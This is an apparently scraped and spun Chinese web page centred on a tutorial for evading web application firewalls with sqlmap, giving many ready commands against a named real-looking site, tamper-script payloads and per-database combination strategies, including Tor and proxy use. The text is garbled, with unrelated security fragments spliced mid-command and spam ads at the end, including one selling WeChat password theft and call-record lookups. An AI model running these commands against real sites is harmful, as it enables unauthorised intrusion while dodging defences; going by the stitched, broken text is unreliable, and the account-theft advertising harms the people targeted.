现在的 *** 环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,乃至封闭我们的主机IP,所以这个时分,我们就要考虑怎样进行绕过,到达注入的方针。由于现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文依据sqlmap 进行绕过注入测验,介绍至今依然有用有用的技巧,以下战略在特定的环境能够成功绕过,详细是否绕过,请细心检查输出的信息。
0x01 承认WAF首要我们判别该We一同,新建了一个 administrator 假超级用户帐号,并设置了一个100位长的暗码,此用户不属于任何组,不具有任何权限,用于威逼侵犯者,俗称“骗局帐号”。
b 服务器是否被WAF/IPS/IDS保护着。这点很简单完成,由于我们在漏扫或许运用专门东西来检测是否有WAF,这个检测,在nmap 的NSE,或许WVS的战略或许APPSCAN的战略中都有,我们能够运用这些来判别。在此我们,也介绍运用sqlmap 进行检测是否有WAF/IPS/IDSroot@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#首选
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --check-waf#备选
0x02 运用参数进行绕过root@kali:~# sqlmap -u &q }uot;http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 #运用恣意浏览器进行绕过,尤其是在WAF装备不妥的时分
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3#运用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=60 #运用长的延时来防止触发WAF的机制,这办法比较耗时
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985#运用署理进行注入
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --ignore-proxy#制止运用系统的署理,直接衔接进行注入
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --flush-session#清空会话,重构注入
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hex#或许运用参数 --no-cast ,进行字符码转化
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --mobile #对移动端的服务器进行注入
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tor # 匿名注入
0x03 运用脚本介绍1 运用格局:root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tamper=A.py,B.py#脚本A,脚本B
2 脚本总类01 apostrophemask.py#用utf8替代引号;Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
02 equaltolike.py#MSSQL * SQLite中like 替代等号;Example: Input: SELECT * FROM users WHERE id=1 ;Output: SELECT * FROM users WHERE id LIKE 1
03 greatest.py#MySQL中绕过过滤’>’ ,用GREATEST替换大于号;Example: ('1 AND A > B') '1 AND GREATEST(A,B+1)=A'
04 space2hash.py#空格替换为#号 随机字符串 以及换行符;Input: 1 AND 9227=9227;Output: 1%2 *** TTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
05 apostrophenullencode.py#MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL绕过过滤双引号,替换字符和双引号;
06 halfversionedmorekeywords.py#当数据库为mysql时绕过防火墙,每个要害字之前增加mysql版别谈论;
07 space2morehash.py#MySQL中空格替换为 #号 以及更多随机字符串 换行符;
08 appendnullbyte.py#Microsoft Access在有用负荷完毕方位加载零字节字符编码;Example: ('1 AND 1=1') '1 AND 1=1%00'
09 ifnull2ifisnull.py#MySQL,SQLite (possibly),SAP MaxDB绕过对 IFNULL 过滤。 替换相似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’
10 space2mssqlblank.py(mssql)#mssql空格替换为其它空符号
11base64encode.py#用base64编码j Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all
12 space2mssqlhash.py#mssql查询中替换空格
13 modsecurityversioned.py#(mysql中过滤空格,包括完好的查询版别注释;Example: ('1 AND 2>1--') '1 /*!30874AND 2>1*/--'
14 space2mysqlblank.py#(mysql中空格替换其它空白符号
15 between.py#MS SQL 2005,MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0顶用between替换大于号(>)
16 space2mysqldash.py#MySQL,MSSQL替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)
17 multiplespaces.py#环绕SQL要害字增加多个空格;Example: ('1 UNION SELECT foobar') '1 UNION SELECT foobar'
18 space2plus.py#用+替换空格;Example: ('SELECT id FROM users') 'SELECT+id+FROM+users'
19 bluecoat.py#MySQL 5.1, SGOS替代空格字符后与一个有用的随机空白字符的SQL句子。 然后替换=为like
20 nonrecursivereplacement.py#两层查询句子。替代predefined SQL要害字with表明 suitable for替代(例如 .replace(“SELECT”、””)) filters
21 space2randomblank.py#替代空格字符(“”)从一个随机的空白字符可选字符的有用集
22 sp_password.py#追加sp_password’从DBMS日志的主动含糊处理的26 有用载荷的结尾
23 chardoubleencode.py#双url编码(不处理以编码的)
24 unionalltounion.py#替换UNION ALL SELECT UNION SELECT;Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'
25 charencode.py#Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0url编码;
26 randomcase.py#Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0中随机大小写
27 unmagicquotes.py#宽字符绕过 GPC addslashes;Example: * Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20
28 randomcomments.py#用/**/切割sql要害字;Example:‘INSERT’ becomes ‘IN//S//ERT’
29 charunicodeencode.py#ASP,ASP.NET中字符串 unicode 编码;
30 securesphere.py#追加特制的字符串;Example: ('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"
31 versionedmorekeywords.py#MySQL >= 5.1.13注释绕过
32 space2comment.py#Replaces space character (‘ ‘) with comments ‘/**/’
33 halfversionedmorekeywords.py#MySQL < 5.1中要害字前加注释
0x04脚本参数组合战略绕过1 mysql绕过:
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 -delay=3.5 --tamper=space2hash.py,modsecurityversioned.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent --hpp --tamper=space2mysqldash.p,versionedmorekeywords.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" -delay=3.5 ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=apostrophemask.py,equaltolike.py
补白:这些组合战略能够依据注入的反应信息,及时调整组合战略
2 MSSQL:root@kali:~# sqlmap -u "http://yiliao.kingd }ee.com/contents.php?id=51&types=4" -delay=3.5 ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=randomcase.py,charencode.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --hpp --tamper=space2comment.py,randomcase.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=120 --tamper=space2mssqlblank.py,securesphere.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --tamper=unionalltoun需求内嵌代码ion.py,base64encode.p
3 ms access:root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --random-agent --tamper=appendnullbyte.py,space2plus.py
root@kali:~# sqlmap -u "http://yiliao.kin
◆搜索功用:能对指定组或许整个数据库进行搜索。
gdee.com/contents.php?id=51&types=4" --delay=3.5 --random-agent --hpp --tamper=chardoubleencode.py4 Oracle:root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=5 --random-agent --hpp --tamper=unmagicquotes.py,unionalltounion.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=5--user-agent =“Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0&r目录dquo; --hpp --tamper=charunicodeencode.py,chardoubleencode.py
5 主张:由于WAF或许选用白名单规矩,所以关于挑选哪种战略,重点是依据-v 3 提示的信息进行判别,能够抓取干流的浏览器的user-agent ,s恰当的延时,加上注入字符转化---大小写、空格、字符串、注释、加密等等办法
鉴于参数和32种脚本,在我们平常的注入,这些通过不同的多重组合来进行测验,这个测验或许比较耗时
有用盗号网址:运用sqlmap 绕过防火墙进行注入测验
Pend: 417/0__a *** __("lea eax,[ebp+0x2e]");功用模块使用sqlmap 绕过防火墙进行注入测试
有效盗号网址分析之前,我们需求理清思路,逐步分析,慢慢行成一套归于自己的分析流程。通过SystemTimeToFileTime()将SystemTime转化为FileTime。这是将这个样本APP激活成设备管理器,在meta-data中知道device_admin_sample.xml文件存放了,激活设备管理器央求打开的战略,并且一旦战略被触发就会调用这个广播接收器中重写的办法,如图7.png,都会打印一条日志:
Xmanager Enterprise Build 1236nt!PspAllocateProcess+0xb4blong ptrace(int request, pid_t pid, void *addr, void *data);有效盗号网址
请注意,我写这篇文章只是出于教育目的哦——悉数因此带来的成果和本文作者、译者无关。
一、 前语0xbfff0000 XX XX XX XX 使用sqlmap 绕过防火墙进行注入测试
有效盗号网址运用私有目录被束缚访问(0700),文件所有者将无法通过设置私有文件访问办法为MODE_WORLD_READABLE与MODE_WORLD_WRITEABLE来打开私有文件的读写权限;此外,通过file:///URI也将无法访问到运用包之外的途径;一同DownloadManager将不能通过文件名来同享私有文件的信息。若要在运用间同享文件,开发者能够发送一项content://URI,并授权URI的暂时访问权限。进行此授权的最简略办法是运用FileProvider类。这一改动有用保证了同享文件的安全问题。7.1 中间人侵犯输出: 简介
[Bash shell] 纯文本检查 拷贝代码脚本大致内容:基本信息核算(IP地址、MAC地址、端口信息、服务信息等)、主机安全检查(包括等保三级要求主机相关的检查点)、系统功用核算(暂时未参与分析)、恶意代码、程序检查等检查点。 有效盗号网址
drwxr-xr-x 2 root root 4096 Sep 14 03:13 20140914
使用sqlmap 绕过防火墙进行注入测试2.信息收集
通过查找游戏的主页面的类”88369game”来判别我们输入的用户名是否有用。假设找到游戏的主界面恶意dll才会发送用户的游戏账号和暗码,假设没有查找到游戏的界面就不会发送
假设没有换行的话,n其实是能够省掉的,但是引号必不行少。下面这样就不行: if (pThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG32)干洗店加盟项目以其高收益低投入低风险的优势迅速成为广大投资者眼中的香饽饽,越来越多的投资者把眼光瞄准了干洗行业,把加盟一家干洗店连锁品牌作为进入干洗行业最快捷的方式和途径。然而往往在干洗店加盟考察...
“武汉商务小学妹价格费用-【卫翠翠】”找”上海模特在线预约女经纪人微信号”,要通过正规的模特网站平台进行在线预约和寻找,通过添加上海模特,女经纪人来联系到最新的模特个人微信号以及联系方式,查看经纪人微...
微信怎么悄悄定位别人的位置(微信偷偷定位好友位置方法)【黑客徽信:】专业盗取微信密码,开房查询,通话记录查询,查询微信聊天记录,非常靠谱!谈到微信,很多人第一次想到社交网络、微信支付和红包。事实上,除...
大家创业的时候光有劲头是完全不够的,只有我们选对了加盟品牌,才是非常重要的,自己的发展才能够更加顺利。胜司奶茶投资靠谱吗?优势多多值得加盟,胜司奶茶加盟项目确实是一个好的加盟品牌,项目不仅非常的靠谱,...
在当下有许多朋友围观小野猪误闯玻璃栈道后秒怂的画面,看看这细节、这画面,还真的是今日快乐源泉呀!我们来了解下经过,这头小野猪如何会误闯玻璃栈道的呢,究竟怎么回事?据了解到,此事于11月2日在杭州淳安石...
很多运营优化外贸网站的朋友面临过或正在面临以下的问题:刚接手一个外贸网站,该从哪里下手呢?内容,关键词还是其他? 网站优化过程中,思路突然卡壳了,不知道下一步该怎么办?网站关键词上排名了,不知道为什么...